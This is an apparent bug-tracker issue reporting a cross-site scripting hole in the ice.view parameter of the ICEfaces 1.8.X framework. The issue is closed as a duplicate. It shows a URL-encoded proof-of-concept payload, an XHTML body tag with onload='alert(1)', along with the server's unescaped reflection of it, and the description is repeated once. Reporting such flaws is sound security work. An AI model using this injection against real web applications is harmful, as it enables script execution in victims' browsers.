Details
-
Type:
Bug
-
Status: Closed
-
Priority:
Major
-
Resolution: Duplicate
-
Affects Version/s: None
-
Fix Version/s: None
-
Component/s: Framework
-
Labels:None
-
Environment:Windows WebLogic App Server
Description
The ice.view parameter of the framework is not properly validated. it is possible to inject values that might be executed as javascript in browsers
the following request:
ice.view=<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>
leads to the following response from the system:
<reload view="<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>"/>
Testing was conducted on ICEfaces 1.8.X. If this bug has been fixed in a later release, please provide further information.
the following request:
ice.view=<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>
leads to the following response from the system:
<reload view="<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>"/>
Testing was conducted on ICEfaces 1.8.X. If this bug has been fixed in a later release, please provide further information.
Activity
- All
- Comments
- History
- Activity
- Remote Attachments
- Subversion
| Field | Original Value | New Value |
|---|---|---|
| Attachment | xss.txt [ 12958 ] |
| Link | This issue duplicates ICE-5181 [ ICE-5181 ] |
| Status | Open [ 1 ] | Closed [ 6 ] |
| Resolution | Duplicate [ 3 ] |